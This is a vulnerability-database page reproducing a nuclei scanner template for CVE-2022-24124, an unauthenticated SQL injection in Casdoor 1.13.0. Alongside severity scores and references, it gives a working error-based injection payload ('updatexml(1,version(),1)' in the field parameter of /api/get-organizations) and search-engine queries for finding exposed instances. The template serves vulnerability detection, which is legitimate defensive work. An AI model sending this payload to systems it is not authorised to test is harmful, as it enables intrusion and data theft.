Lucene search
K

Casdoor 1.13.0 - Unauthenticated SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Casdoor 1.13.0 - Unauthenticated SQL Injection vulnerabilit

Related
Refs
Code
id: CVE-2022-24124

info:
  name: Casdoor 1.13.0 - Unauthenticated SQL Injection
  author: cckuailong
  severity: high
  description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability.
  reference:
    - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
    - https://www.exploit-db.com/exploits/50792
    - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24124
    - https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24124
    cwe-id: CWE-89
    epss-score: 0.58927
    epss-percentile: 0.98994
    cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: casbin
    product: casdoor
    shodan-query:
      - http.title:"Casdoor"
      - http.title:"casdoor"
    fofa-query: title="casdoor"
    google-query: intitle:"casdoor"
  tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "XPATH syntax error.*&#39"
          - "casdoor"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b771bd1b94e6634811d83e303dce53b45c7db15cb4d9d5b3d6cd8983169cced7022031eb28184b1e96eb2bbf7a99e1863f9c2c12ac2491f5a30aa4eec5721caf86dc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 3.17.5
EPSS0.58927
28